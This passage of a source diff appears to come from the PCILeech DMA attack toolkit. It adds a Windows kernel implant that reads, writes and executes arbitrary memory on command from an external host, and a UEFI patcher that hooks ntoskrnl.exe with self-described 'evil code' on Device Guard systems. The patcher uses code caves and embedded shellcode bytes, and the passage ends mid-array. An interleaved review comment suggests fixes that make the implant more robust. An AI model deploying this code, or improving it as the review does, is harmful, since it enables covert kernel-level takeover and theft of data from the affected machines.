+ _In_ BOOLEAN Alertable,
+ _In_ PINT64 pllInterval_Neg100ns
+ );
+ QWORD ReservedFutureUse[21];
+} NTOS, *PNTOS;
+
+#define KMDDATA_OPERATING_SYSTEM_WINDOWS 0x01
+#define KMDDATA_MAGIC 0xff11337711333377
+
+/*
+* KMD DATA struct. This struct must be contained in a 4096 byte section (page).
+* This page/struct is used to communicate between the inserted kernel code and
+* the pcileech program.
+* VNR: 003
+*/
+typedef struct tdKMDDATA {
+ QWORD MAGIC; // [0x000] magic number 0x0ff11337711333377.
+ QWORD AddrKernelBase; // [0x008] pre-filled by stage2, virtual address of kernel header (WINDOWS/MACOS).
+ QWORD AddrKallsymsLookupName; // [0x010] pre-filled by stage2, virtual address of kallsyms_lookup_name (LINUX).
+ QWORD DMASizeBuffer; // [0x018] size of DMA buffer.
+ QWORD DMAAddrPhysical; // [0x020] physical address of DMA buffer.
+ QWORD DMAAddrVirtual; // [0x028] virtual address of DMA buffer.
+ QWORD _status; // [0x030] status of operation
+ QWORD _result; // [0x038] result of operation TRUE|FALSE
+ QWORD _address; // [0x040] address to operate on.
+ QWORD _size; // [0x048] size of operation / data in DMA buffer.
+ QWORD OperatingSystem; // [0x050] operating system type
+ QWORD ReservedKMD[8]; // [0x058] reserved for specific kmd data (dependant on KMD version).
+ QWORD ReservedFutureUse1[13]; // [0x098] reserved for future use.
+ QWORD dataInExtraLength; // [0x100] length of extra in-data.
+ QWORD dataInExtraOffset; // [0x108] offset from DMAAddrPhysical/DMAAddrVirtual.
+ QWORD dataInExtraLengthMax; // [0x110] maximum length of extra in-data.
+ QWORD dataInConsoleBuffer; // [0x118] physical address of 1-page console buffer.
+ QWORD dataIn[28]; // [0x120]
+ QWORD dataOutExtraLength; // [0x200] length of extra out-data.
+ QWORD dataOutExtraOffset; // [0x208] offset from DMAAddrPhysical/DMAAddrVirtual.
+ QWORD dataOutExtraLengthMax; // [0x210] maximum length of extra out-data.
+ QWORD dataOutConsoleBuffer; // [0x218] physical address of 1-page console buffer.
+ QWORD dataOut[28]; // [0x220]
+ NTOS fn; // [0x300] used by shellcode to store function pointers.
+ CHAR dataInStr[MAX_PATH]; // [0x400] string in-data
+ CHAR ReservedFutureUse2[252];
+ CHAR dataOutStr[MAX_PATH]; // [0x600] string out-data
+ CHAR ReservedFutureUse3[252];
+ QWORD ReservedFutureUse4[255]; // [0x800]
+ QWORD _op; // [0xFF8] (op is last 8 bytes in 4k-page)
+} KMDDATA, *PKMDDATA;
+
+// ----------------------------- SHELLCODE FUNCTIONS BELOW (STAGE2) -----------------------------
+
+DWORD HashROR13A(_In_ LPCSTR sz)
+{
+ DWORD dwVal, dwHash = 0;
+ while(*sz) {
+ dwVal = (DWORD)*sz++;
+ dwHash = (dwHash >> 13) | (dwHash << 19);
+ dwHash += dwVal;
+ }
+ return dwHash;
+}
+
+/*
+* Lookup a function and return it, if found.
+* -- hModule
+* -- dwProcNameH
+* -- return
+*/
+QWORD PEGetProcAddressH(_In_ QWORD hModule, _In_ DWORD dwProcNameH)
+{
+ PDWORD pdwRVAAddrNames, pdwRVAAddrFunctions;
+ PWORD pwNameOrdinals;
+ DWORD i, dwFnIdx, dwHash;
+ LPSTR sz;
+ PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)hModule; // dos header.
+ PIMAGE_NT_HEADERS ntHeader = (PIMAGE_NT_HEADERS)(hModule + dosHeader->e_lfanew); // nt header
+ PIMAGE_EXPORT_DIRECTORY exp = (PIMAGE_EXPORT_DIRECTORY)(ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress + hModule);
+ pdwRVAAddrNames = (PDWORD)(hModule + exp->AddressOfNames);
+ pwNameOrdinals = (PWORD)(hModule + exp->AddressOfNameOrdinals);
+ pdwRVAAddrFunctions = (PDWORD)(hModule + exp->AddressOfFunctions);
+ for(i = 0; i < exp->NumberOfNames; i++) {
+ sz = (LPSTR)(hModule + pdwRVAAddrNames[i]);
+ dwHash = HashROR13A(sz);
+ if(dwHash == dwProcNameH) {
+ dwFnIdx = pwNameOrdinals[i];
+ if(dwFnIdx >= exp->NumberOfFunctions) { return 0; }
+ return hModule + pdwRVAAddrFunctions[dwFnIdx];
+ }
+ }
+ return 0;
+}
+
+#define KMD_CMD_VOID 0xffff
+#define KMD_CMD_COMPLETED 0
+#define KMD_CMD_READ 1
+#define KMD_CMD_WRITE 2
+#define KMD_CMD_TERMINATE 3
+#define KMD_CMD_MEM_INFO 4
+#define KMD_CMD_EXEC 5
+#define KMD_CMD_READ_VA 6
+#define KMD_CMD_WRITE_VA 7
+#define KMD_CMD_EXEC_EXTENDED 8
+
+// status:
+// 1: ready for command
+// 2: processing
+// f0000000: terminated
+// f0000000+: error
+// op: - see KMD_CMD defines
+// result:
+// 0: FALSE
+// 1: TRUE
+// address:
+// physical base address for memory operation
+// size:
+// size of memory operation
+VOID stage3_c_MainCommandLoop(PKMDDATA pk)
+{
+ LONGLONG llTimeToWait = -10000; // 1000 uS (negative multiples of 100ns)
+ PVOID pvBufferOutDMA;
+ PPHYSICAL_MEMORY_RANGE pMemMap;
+ PVOID pvMM = NULL;
+ QWORD i, idleCount = 0;
+ // 1: set up mem out dma area 16MB//4MB in lower 4GB
+ pk->DMASizeBuffer = 0x1000000;
+ pvBufferOutDMA = pk->fn.MmAllocateContiguousMemory(0x01000000, 0xffffffff);
+ if(!pvBufferOutDMA) {
+ pk->DMASizeBuffer = 0x00400000;
+ pvBufferOutDMA = pk->fn.MmAllocateContiguousMemory(0x00400000, 0xffffffff);
+ }
+ if(!pvBufferOutDMA) {
+ pk->DMASizeBuffer = 0;
+ pk->_status = 0xf0000001;
+ return;
+ }
+ pk->DMAAddrVirtual = (QWORD)pvBufferOutDMA;
+ pk->DMAAddrPhysical = pk->fn.MmGetPhysicalAddress(pvBufferOutDMA);
+ // 2: main dump loop
+ while(TRUE) {
+ pk->_status = 1;
+ if(KMD_CMD_COMPLETED == pk->_op) { // NOP
+ idleCount++;
+ // thread wait after X number of idle loops - TODO: change to timing
+ if(idleCount > 10000000000) {
+ pk->fn.KeDelayExecutionThread(KernelMode, FALSE, &llTimeToWait);
+ }
+ continue;
+ }
+ pk->_status = 2;
+ if(KMD_CMD_TERMINATE == pk->_op) { // EXIT
+ pk->_status = 0xf0000000;
+ pk->fn.MmFreeContiguousMemory(pvBufferOutDMA);
+ pk->DMAAddrPhysical = 0;
+ pk->DMAAddrVirtual = 0;
+ pk->_result = TRUE;
+ pk->MAGIC = 0;
+ pk->_op = KMD_CMD_COMPLETED;
+ return;
+ }
+ if(KMD_CMD_MEM_INFO == pk->_op) { // INFO (physical section map)
+ pMemMap = pk->fn.MmGetPhysicalMemoryRanges();
+ if(pMemMap == NULL) {
+ pk->_result = FALSE;
+ } else {
+ for(i = 0; (pMemMap[i].BaseAddress) || (pMemMap[i].NumberOfBytes.QuadPart); i++);
+ pk->_size = i * sizeof(PHYSICAL_MEMORY_RANGE);
+ pk->fn.RtlCopyMemory(pvBufferOutDMA, pMemMap, pk->_size);
+ pk->fn.ExFreePool(pMemMap);
+ pk->_result = TRUE;
+ }
+ }
+ if(KMD_CMD_EXEC == pk->_op) { // EXEC at start of buffer
+ if(pk->dataIn[9]) {
+ // PSCMD_KERNEL
+ ((VOID(*)(PKMDDATA))pk->ReservedKMD[1])(pk);
+ pk->_result = TRUE;
+ } else {
+ // VFS
+ ((VOID(*)(PKMDDATA))pk->ReservedKMD[0])(pk);
+ pk->_result = TRUE;
+ }
+ }
+ if(KMD_CMD_READ == pk->_op || KMD_CMD_WRITE == pk->_op) { // PHYSICAL MEMORY READ/WRITE
+ if(pk->dataIn[9] == 0) {
+ pvMM = NULL; // no memory read if vfs (might crash the system accidentally)
+ } else {
+ pvMM = pk->fn.MmMapIoSpace(pk->_address, pk->_size, 0);
+ }
+ if(pvMM) {
+ if(KMD_CMD_READ == pk->_op) { // READ
+ pk->fn.RtlCopyMemory(pvBufferOutDMA, pvMM, pk->_size);
+ } else { // WRITE
+ pk->fn.RtlCopyMemory(pvMM, pvBufferOutDMA, pk->_size);
+ }
+ pk->fn.MmUnmapIoSpace(pvMM, pk->_size);
+ pk->_result = TRUE;
+ } else {
+ pk->_result = FALSE;
+ }
+ }
+ if(KMD_CMD_READ_VA == pk->_op) { // READ Virtual Address
+ pk->fn.RtlCopyMemory(pvBufferOutDMA, (PVOID)pk->_address, pk->_size);
+ pk->_result = TRUE;
+ }
+ if(KMD_CMD_WRITE_VA == pk->_op) { // WRITE Virtual Address
+ pk->fn.RtlCopyMemory((PVOID)pk->_address, pvBufferOutDMA, pk->_size);
+ pk->_result = TRUE;
+ }
+ pk->_op = KMD_CMD_COMPLETED;
+ idleCount = 0;
+ }
+}
+
+#define DATA_OFFSET_TRIGGER_COUNT 0x02
+#define DATA_OFFSET_KMD_THIS 0x08
+#define DATA_OFFSET_VFS 0x0c
+#define DATA_OFFSET_PSCMD_KERNEL 0x10
+#define DATA_OFFSET_PSCMD_USER 0x14
+VOID c_EntryPoint_Thread(QWORD qwAddrNtosBase, QWORD qwAddrKmdBase)
+{
+ PVOID(*MmMapIoSpace)(PHYSICAL_ADDRESS, SIZE_T, MEMORY_CACHING_TYPE);
+ VOID(*MmUnmapIoSpace)(PVOID, SIZE_T);
+ PVOID(*MmAllocateContiguousMemory)(SIZE_T, PHYSICAL_ADDRESS);
+ PHYSICAL_ADDRESS(*MmGetPhysicalAddress)(PVOID);
+ VOID(*RtlZeroMemory)(PVOID, SIZE_T);
+ PVOID pvKMD, pvPA1000;
+ PKMDDATA pk;
+ DWORD i = 0, NAMES[32];
+ QWORD vaAddrZero;
+ MmMapIoSpace = (PVOID(*)(PHYSICAL_ADDRESS, SIZE_T, MEMORY_CACHING_TYPE))PEGetProcAddressH(qwAddrNtosBase, H_MmMapIoSpace);
+ MmUnmapIoSpace = (VOID(*)(PVOID, SIZE_T))PEGetProcAddressH(qwAddrNtosBase, H_MmUnmapIoSpace);
+ MmAllocateContiguousMemory = (PVOID(*)(SIZE_T, PHYSICAL_ADDRESS))PEGetProcAddressH(qwAddrNtosBase, H_MmAllocateContiguousMemory);
+ MmGetPhysicalAddress = (PHYSICAL_ADDRESS(*)(PVOID))PEGetProcAddressH(qwAddrNtosBase, H_MmGetPhysicalAddress);
+ RtlZeroMemory = (VOID(*)(PVOID, SIZE_T))PEGetProcAddressH(qwAddrNtosBase, H_RtlZeroMemory);
+ pvKMD = MmMapIoSpace(0x3000, 0x1000, 0);
+ if(!pvKMD) { return; }
+ RtlZeroMemory(pvKMD, 0x1000);
+ pk = (PKMDDATA)pvKMD;
+ pk->AddrKernelBase = qwAddrNtosBase;
+ pk->MAGIC = 0x0ff11337711333377;
+ pk->OperatingSystem = KMDDATA_OPERATING_SYSTEM_WINDOWS;
+ vaAddrZero = qwAddrKmdBase - *(PDWORD)(qwAddrKmdBase + DATA_OFFSET_KMD_THIS);
+ pk->ReservedKMD[0] = vaAddrZero + *(PDWORD)(qwAddrKmdBase + DATA_OFFSET_VFS);
+ pk->ReservedKMD[1] = vaAddrZero + *(PDWORD)(qwAddrKmdBase + DATA_OFFSET_PSCMD_KERNEL);
+ pk->ReservedKMD[2] = vaAddrZero + *(PDWORD)(qwAddrKmdBase + DATA_OFFSET_PSCMD_USER);
+ NAMES[i++] = H_ExFreePool;
+ NAMES[i++] = H_MmFreeContiguousMemory;
+ NAMES[i++] = H_MmAllocateContiguousMemory;
+ NAMES[i++] = H_MmGetPhysicalAddress;
+ NAMES[i++] = H_MmGetPhysicalMemoryRanges;
+ NAMES[i++] = H_MmMapIoSpace;
+ NAMES[i++] = H_MmUnmapIoSpace;
+ NAMES[i++] = H_PsCreateSystemThread;
+ NAMES[i++] = H_RtlCopyMemory;
+ NAMES[i++] = H_ZwProtectVirtualMemory;
+ NAMES[i++] = H_KeDelayExecutionThread;
+ while(i) {
+ i--;
+ *((PQWORD)&pk->fn + i) = PEGetProcAddressH(pk->AddrKernelBase, NAMES[i]);
+ }
+ pvPA1000 = MmMapIoSpace(0x1000, 0x1000, 0);
+ *(PQWORD)((QWORD)pvPA1000 + 0xc0) = MmGetPhysicalAddress(pvKMD);
+ *(PQWORD)((QWORD)pvPA1000 + 0xb0) = KMDDATA_MAGIC;
+ MmUnmapIoSpace(pvPA1000, 0x1000);
+ stage3_c_MainCommandLoop(pk);
+}
+
+VOID c_EntryPoint(QWORD qwAddrNtosBase, QWORD qwAddrKmdBase, QWORD qwCR3)
+{
+ PVOID(*MmMapIoSpace)(PHYSICAL_ADDRESS, SIZE_T, MEMORY_CACHING_TYPE);
+ VOID(*MmUnmapIoSpace)(PVOID, SIZE_T);
+ PVOID pvPA1000;
+ QWORD count;
+ WORD cTrigger;
+ MmMapIoSpace = (PVOID(*)(PHYSICAL_ADDRESS, SIZE_T, MEMORY_CACHING_TYPE))PEGetProcAddressH(qwAddrNtosBase, H_MmMapIoSpace);
+ MmUnmapIoSpace = (VOID(*)(PVOID, SIZE_T))PEGetProcAddressH(qwAddrNtosBase, H_MmUnmapIoSpace);
+ pvPA1000 = MmMapIoSpace(0x1000, 0x1000, 0);
+ if(!pvPA1000) { return; }
+ if((*(PQWORD)((QWORD)pvPA1000 + 0xa0) == qwCR3)) {
+ cTrigger = *(PWORD)(qwAddrKmdBase + DATA_OFFSET_TRIGGER_COUNT);
+ count = *(PQWORD)((QWORD)pvPA1000 + 0xb8) = *(PQWORD)((QWORD)pvPA1000 + 0xb8) + 1;
+ if(count == cTrigger) {
+ MmUnmapIoSpace(pvPA1000, 0x1000);
+ //INFO: it seems like we cannot create system thread due to security checks
+ //PsCreateSystemThread = (NTSTATUS(*)(PHANDLE, ULONG, POBJECT_ATTRIBUTES, HANDLE, PCLIENT_ID, PKSTART_ROUTINE, PVOID))PEGetProcAddressH(qwAddrNtosBase, H_PsCreateSystemThread);
+ //PsCreateSystemThread(&hThread, 0x1ffff, NULL, NULL, NULL, (PKSTART_ROUTINE)c_EntryPoint_Thread, (PVOID)qwAddrNtosBase);
+ //INFO: hijack is fine with 'security' though =P
+ c_EntryPoint_Thread(qwAddrNtosBase, qwAddrKmdBase);
+ return;
+ }
+ }
+ MmUnmapIoSpace(pvPA1000, 0x1000);
+}
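Review bot: The physical READ/WRITE branch (`RtlCopyMemory(pvBufferOutDMA, pvMM, pk->_size)` and its mirror) and the READ_VA/WRITE_VA branches in `stage3_c_MainCommandLoop` copy `pk->_size` bytes through `pvBufferOutDMA` without ever comparing `_size` to `pk->DMASizeBuffer`, the 16MB-or-4MB allocation made at the top of the same function; `_size` is written into the shared page by the host, so an oversized request runs past the contiguous buffer and corrupts adjacent kernel memory instead of failing the command. A guard right after `pk->_status = 2;` that fails the four data-moving ops when `_size` exceeds the buffer (MEM_INFO computes its own `_size` and must stay unfiltered) is shown below. Separately, `c_EntryPoint_Thread` stores through `pvPA1000` at `+0xc0` and `+0xb0` immediately after `MmMapIoSpace(0x1000, 0x1000, 0)` with no NULL test, whereas `c_EntryPoint` checks the same mapping with `if(!pvPA1000) { return; }` before touching it; the thread path should do the same. The `PEGetProcAddressH` lookups that fill `pk->fn` (and the five local pointers above them) return 0 on failure and are then called unchecked in the command loop, so a lookup miss would be a null call in kernel mode; reporting it via `pk->_status` and returning would be cheaper than the crash.
```c
        pk->_status = 2;
        // Reject data-moving commands whose size exceeds the DMA buffer allocated above;
        // MEM_INFO sets its own _size and is deliberately not filtered here.
        if((KMD_CMD_READ == pk->_op || KMD_CMD_WRITE == pk->_op || KMD_CMD_READ_VA == pk->_op || KMD_CMD_WRITE_VA == pk->_op) && (pk->_size > pk->DMASizeBuffer)) {
            pk->_result = FALSE;
            pk->_op = KMD_CMD_COMPLETED;
            idleCount = 0;
            continue;
        }
        // … unchanged: TERMINATE / MEM_INFO / EXEC / READ / WRITE / READ_VA / WRITE_VA handlers …
```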
diff --git a/pcileech_shellcode/uefi_winload_ntos_patch.c b/pcileech_shellcode/uefi_winload_ntos_patch.c
new file mode 100644
index 0000000..5892ca7
--- /dev/null
+++ b/pcileech_shellcode/uefi_winload_ntos_patch.c
@@ -0,0 +1,949 @@
+// uefi_winload_ntos_patch.c : hooks/patches ntoskrnl.exe!PsCreateSystemThreadEx with evil code.
+// evil code consists of:
+// - custom kernel module
+// - mount (vfs) payload (use with 'pcileech mount')
+// - pscmd payload (use with 'pcileech wx64_pscmd -9 1')
+//
+// (planned to be used in demo at 34c3)
+//
+// (c) Ulf Frisk, 2017
+// Author: Ulf Frisk, pcileech@frizk.net
+//
+// compile with:
+// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel uefi_common.c
+// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel uefi_winload_ntos_patch.c
+// ml64.exe uefi_common_a.asm /Feuefi_winload_ntos_patch.exe /link /NODEFAULTLIB /RELEASE /MACHINE:X64 /entry:main uefi_winload_ntos_patch.obj uefi_common.obj
+// shellcode64.exe -o uefi_winload_ntos_patch.exe "UEFI WINLOAD NTOSKRNL.EXE PATCHER FOR DEVICE GUARD SYSTEMS\n===========================================================\nPatches ntoskrnl.exe!PsCreateSystemThread with executable set separately with\nthe in parameter. Must be run from ExitBootServices. Targets Windows 10 with\nDevice Guard only! Good value for num_threads_skip is 0x50.\nSyntax: pcileech.exe uefi_winload_ntos_patch -in -0 \nGENERAL INFORMATION BELOW:%s\n Status : %016llx\n NTOSKRNL.EXE : %016llx\n Hooked Function : %016llx\n Code Cave VFS : %016llx\n Code Cave KMD : %016llx\n Code Cave CMD #1 : %016llx\n Code Cave CMD #2 : %016llx\n"
+//
+#include "uefi_common.h"
+
+// ----------------------------------------------------------------------------
+// UTILITY FUNCTIONS BELOW:
+// ----------------------------------------------------------------------------
+
+/*
+* Calculate a ROR13 hash given an ANSI string.
+* -- sz
+* -- return
+*/
+DWORD HashROR13A(LPSTR sz)
+{
+ DWORD dwVal, dwHash = 0;
+ while(*sz) {
+ dwVal = (DWORD)*sz++;
+ dwHash = (dwHash >> 13) | (dwHash << 19);
+ dwHash += dwVal;
+ }
+ return dwHash;
+}
+
+/*
+* Lookup address of function given a module base address and a ROR13 hash.
+* -- hModule = base address of PE to look for function in.
+* -- dwProcNameH = ROR13 hash of function name to lookup.
+* -- return = address of function, 0 = fail.
+*/
+QWORD PEGetProcAddressH(QWORD hModule, DWORD dwProcNameH)
+{
+ PDWORD pdwRVAAddrNames, pdwRVAAddrFunctions;
+ PWORD pwNameOrdinals;
+ DWORD i, dwFnIdx, dwHash;
+ LPSTR sz;
+ PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)hModule; // dos header.
+ if(!dosHeader || dosHeader->e_magic != IMAGE_DOS_SIGNATURE) { return 0; }
+ PIMAGE_NT_HEADERS ntHeader = (PIMAGE_NT_HEADERS)(hModule + dosHeader->e_lfanew); // nt header
+ if(!ntHeader || ntHeader->Signature != IMAGE_NT_SIGNATURE) { return 0; }
+ PIMAGE_EXPORT_DIRECTORY exp = (PIMAGE_EXPORT_DIRECTORY)(ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress + hModule);
+ if(!exp || !exp->NumberOfNames || !exp->AddressOfNames) { return 0; }
+ pdwRVAAddrNames = (PDWORD)(hModule + exp->AddressOfNames);
+ pwNameOrdinals = (PWORD)(hModule + exp->AddressOfNameOrdinals);
+ pdwRVAAddrFunctions = (PDWORD)(hModule + exp->AddressOfFunctions);
+ for(i = 0; i < exp->NumberOfNames; i++) {
+ sz = (LPSTR)(hModule + pdwRVAAddrNames[i]);
+ dwHash = HashROR13A(sz);
+ if(dwHash == dwProcNameH) {
+ dwFnIdx = pwNameOrdinals[i];
+ if(dwFnIdx >= exp->NumberOfFunctions) { return 0; }
+ return (QWORD)(hModule + pdwRVAAddrFunctions[dwFnIdx]);
+ }
+ }
+ return 0;
+}
+
+BOOL PEGetSection(QWORD hModule, QWORD qwSzSection, PDWORD pdwSectionBaseRel, PDWORD pdwSectionSize)
+{
+ PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)hModule; // dos header.
+ if(!dosHeader || dosHeader->e_magic != IMAGE_DOS_SIGNATURE) { return FALSE; }
+ PIMAGE_NT_HEADERS ntHeader = (PIMAGE_NT_HEADERS)(hModule + dosHeader->e_lfanew); // nt header
+ if(!ntHeader || ntHeader->Signature != IMAGE_NT_SIGNATURE) { return FALSE; }
+ int nSections = ntHeader->FileHeader.NumberOfSections;
+ for(int i = 0; i < nSections; i++) {
+ PIMAGE_SECTION_HEADER sectionHeader = (PIMAGE_SECTION_HEADER)(hModule + dosHeader->e_lfanew + sizeof(IMAGE_NT_HEADERS64) + i * sizeof(IMAGE_SECTION_HEADER));
+ if(*(PQWORD)sectionHeader->Name == qwSzSection) {
+ *pdwSectionBaseRel = sectionHeader->VirtualAddress;
+ *pdwSectionSize = sectionHeader->Misc.VirtualSize;
+ return TRUE;
+ }
+ }
+ return FALSE;
+}
+
+// ----------------------------------------------------------------------------
+// "SPECIALIZED" UTILITY FUNCTIONS BELOW:
+// ----------------------------------------------------------------------------
+
+/*
+* When ExitBootServices() is called by winload.efi ntoskrnl.exe (and hvix.exe)
+* are already loaded and integrity checked by winload. The location of ntoskrnl
+* is randomized in memory, but is usually found between address: 0x01000000 and
+* 0x04000000.
+* -- return = base address of ntoskrnl.exe, 0 if fail.
+*/
+QWORD FindNtoskrnl()
+{
+ QWORD qwA, o;
+ BOOL fINITKDBG, fPOOLCODE;
+ for(qwA = 0x01000000; qwA < 0x04000000; qwA += 0x1000) {
+ if(*(PWORD)qwA == 0x5a4d) { // MZ header
+ fINITKDBG = FALSE;
+ fPOOLCODE = FALSE;
+ for(o = 0; o < 0x1000; o += 8) {
+ if(*(PQWORD)(qwA + o) == 0x4742444B54494E49) { // INITKDBG
+ fINITKDBG = TRUE;
+ }
+ if(*(PQWORD)(qwA + o) == 0x45444F434C4F4F50) { // POOLCODE
+ fPOOLCODE = TRUE;
+ }
+ if(fINITKDBG && fPOOLCODE) {
+ return qwA;
+ }
+ }
+ }
+ }
+ return 0;
+}
+
+/*
+* Locate a "code cave" - a place (in an executable section) consisting of zeros
+* in which we can put our main executable payload. Function searches forward
+* given a base address to find such a region of max qwSize bytes. Function is
+* dumb and in rare cases code cave returned might be in NX section.
+* -- hModule = base address to start searching from.
+* -- qwSize = size of code cave to locate; max 0x1000 and even QWORD required.
+* -- return = address of located code cave, 0 if fail.
+*/
+QWORD FindCodeCave(QWORD hModule, QWORD qwSize)
+{
+ QWORD STR_SECTIONS_ALLOWED[] = {
+ 0x000000747865742e, // .text
+ 0x0000000045474150, // PAGE
+ 0x45444f434c4f4f50, // POOLCODE
+ 0x00004b4c45474150, // PAGELK
+ 0x0000444b45474150, // PAGEKD
+ 0x534c444845474150 // PAGEHDLS
+ };
+ DWORD i, dwSectionBaseRel, dwSectionSize;
+ QWORD qwACC;
+ for(i = 0; i < sizeof(STR_SECTIONS_ALLOWED) / sizeof(QWORD); i++) {
+ if(!PEGetSection(hModule, STR_SECTIONS_ALLOWED[i], &dwSectionBaseRel, &dwSectionSize)) { continue; } // section not found
+ if(qwSize > (0x1000 - (dwSectionSize & 0xfff))) { continue; } // code cave too small
+ qwACC = hModule + dwSectionBaseRel + dwSectionSize;
+ if(*(PQWORD)qwACC) { continue; } // not empty - code cave probably already taken ...
+ return qwACC;
+ }
+ return 0;
+}
+
+// ----------------------------------------------------------------------------
+// SHELLCODE MODULES (COMPILED SEPARATELY) BELOW:
+// ----------------------------------------------------------------------------
+
+// specially compiled kernel module payload, compile and extract shellcode with:
+//
+// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel uefi_winload_ntos_kmd_c.c
+// ml64.exe uefi_winload_ntos_kmd.asm /Feuefi_winload_ntos_kmd.exe /link /NODEFAULTLIB /RELEASE /MACHINE:X64 /entry:main uefi_winload_ntos_kmd_c.obj
+// shellcode64.exe -o uefi_winload_ntos_kmd.exe
+// xxd -i uefi_winload_ntos_kmd.bin
+VOID GetData_KMD(PBYTE *ppb, PDWORD pcb)
+{
+ BYTE WINX64_KMD_BIN[] = {
+ 0xeb, 0x16, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x50, 0x44, 0x0f, 0x20, 0xc0, 0x84, 0xc0, 0x75, 0x6a, 0x53, 0x51, 0x52,
+ 0x57, 0x56, 0x41, 0x50, 0x41, 0x51, 0x41, 0x52, 0x41, 0x53, 0x41, 0x54,
+ 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x55, 0x48, 0x8d, 0x0d, 0xc2, 0xff,
+ 0xff, 0xff, 0x8b, 0x05, 0xc4, 0xff, 0xff, 0xff, 0x48, 0x2b, 0xc8, 0x8b,
+ 0x05, 0xb7, 0xff, 0xff, 0xff, 0x48, 0x03, 0xc8, 0x48, 0x8d, 0x15, 0xa9,
+ 0xff, 0xff, 0xff, 0x41, 0x0f, 0x20, 0xd8, 0x4c, 0x8b, 0xfc, 0x48, 0x81,
+ 0xec, 0x00, 0x01, 0x00, 0x00, 0x48, 0xc1, 0xec, 0x04, 0x48, 0xc1, 0xe4,
+ 0x04, 0xe8, 0xba, 0x00, 0x00, 0x00, 0x49, 0x8b, 0xe7, 0x5d, 0x41, 0x5f,
+ 0x41, 0x5e, 0x41, 0x5d, 0x41, 0x5c, 0x41, 0x5b, 0x41, 0x5a, 0x41, 0x59,
+ 0x41, 0x58, 0x5e, 0x5f, 0x5a, 0x59, 0x5b, 0x58, 0xc3, 0xcc, 0xcc, 0xcc,
+ 0x48, 0x8b, 0xc4, 0x48, 0x89, 0x58, 0x08, 0x48, 0x89, 0x68, 0x10, 0x48,
+ 0x89, 0x70, 0x18, 0x48, 0x89, 0x78, 0x20, 0x48, 0x63, 0x41, 0x3c, 0x8b,
+ 0xea, 0x33, 0xd2, 0x44, 0x8b, 0x84, 0x08, 0x88, 0x00, 0x00, 0x00, 0x4c,
+ 0x03, 0xc1, 0x45, 0x8b, 0x50, 0x20, 0x41, 0x8b, 0x78, 0x24, 0x4c, 0x03,
+ 0xd1, 0x41, 0x8b, 0x58, 0x1c, 0x48, 0x03, 0xf9, 0x41, 0x8b, 0x70, 0x18,
+ 0x48, 0x03, 0xd9, 0x85, 0xf6, 0x74, 0x2e, 0x45, 0x8b, 0x0a, 0x4c, 0x03,
+ 0xc9, 0x45, 0x33, 0xdb, 0xeb, 0x0d, 0x0f, 0xb6, 0xc0, 0x49, 0xff, 0xc1,
+ 0x41, 0xc1, 0xcb, 0x0d, 0x44, 0x03, 0xd8, 0x41, 0x8a, 0x01, 0x84, 0xc0,
+ 0x75, 0xec, 0x44, 0x3b, 0xdd, 0x74, 0x21, 0xff, 0xc2, 0x49, 0x83, 0xc2,
+ 0x04, 0x3b, 0xd6, 0x72, 0xd2, 0x33, 0xc0, 0x48, 0x8b, 0x5c, 0x24, 0x08,
+ 0x48, 0x8b, 0x6c, 0x24, 0x10, 0x48, 0x8b, 0x74, 0x24, 0x18, 0x48, 0x8b,
+ 0x7c, 0x24, 0x20, 0xc3, 0x0f, 0xb7, 0x14, 0x57, 0x41, 0x3b, 0x50, 0x14,
+ 0x73, 0xdf, 0x8b, 0x04, 0x93, 0x48, 0x03, 0xc1, 0xeb, 0xd9, 0xcc, 0xcc,
+ 0x48, 0x89, 0x5c, 0x24, 0x08, 0x48, 0x89, 0x6c, 0x24, 0x10, 0x48, 0x89,
+ 0x74, 0x24, 0x18, 0x57, 0x41, 0x56, 0x41, 0x57, 0x48, 0x83, 0xec, 0x20,
+ 0x48, 0x8b, 0xf2, 0x4d, 0x8b, 0xf0, 0xba, 0xf9, 0xbe, 0xdd, 0x05, 0x48,
+ 0x8b, 0xe9, 0xe8, 0x39, 0xff, 0xff, 0xff, 0xba, 0xc9, 0xc5, 0x6e, 0x6c,
+ 0x48, 0x8b, 0xcd, 0x48, 0x8b, 0xd8, 0xe8, 0x29, 0xff, 0xff, 0xff, 0x41,
+ 0xbf, 0x00, 0x10, 0x00, 0x00, 0x45, 0x33, 0xc0, 0x41, 0x8b, 0xd7, 0x41,
+ 0x8b, 0xcf, 0x48, 0x8b, 0xf8, 0xff, 0xd3, 0x48, 0x85, 0xc0, 0x74, 0x3a,
+ 0x4c, 0x39, 0xb0, 0xa0, 0x00, 0x00, 0x00, 0x75, 0x29, 0x0f, 0xb7, 0x4e,
+ 0x02, 0x48, 0xff, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x39, 0x88, 0xb8,
+ 0x00, 0x00, 0x00, 0x75, 0x15, 0x41, 0x8b, 0xd7, 0x48, 0x8b, 0xc8, 0xff,
+ 0xd7, 0x48, 0x8b, 0xd6, 0x48, 0x8b, 0xcd, 0xe8, 0x24, 0x00, 0x00, 0x00,
+ 0xeb, 0x08, 0x49, 0x8b, 0xd7, 0x48, 0x8b, 0xc8, 0xff, 0xd7, 0x48, 0x8b,
+ 0x5c, 0x24, 0x40, 0x48, 0x8b, 0x6c, 0x24, 0x48, 0x48, 0x8b, 0x74, 0x24,
+ 0x50, 0x48, 0x83, 0xc4, 0x20, 0x41, 0x5f, 0x41, 0x5e, 0x5f, 0xc3, 0xcc,
+ 0x48, 0x8b, 0xc4, 0x48, 0x89, 0x58, 0x08, 0x48, 0x89, 0x70, 0x10, 0x48,
